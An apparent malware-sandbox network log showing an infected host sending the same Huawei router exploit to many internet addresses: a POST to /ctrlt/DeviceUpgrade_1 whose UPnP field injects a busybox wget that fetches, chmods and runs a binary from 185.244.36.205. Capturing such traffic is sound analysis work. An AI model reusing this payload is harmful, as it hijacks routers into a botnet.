                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2172192.168.2.1550346121.91.114.16337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.128945112 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2173192.168.2.1536428190.29.251.4737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.128947973 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2174192.168.2.1556876121.46.168.19737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.129076004 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2175192.168.2.1560706190.70.85.13037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.129122972 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2176192.168.2.153748841.147.111.23137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.129319906 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2177192.168.2.154101831.100.57.7437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.129376888 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2178192.168.2.155382894.196.155.16637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.129430056 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2179192.168.2.1552680222.46.243.16137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.129637003 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2180192.168.2.155333094.7.108.12137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.129678965 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2181192.168.2.153858051.140.49.7437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.129681110 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
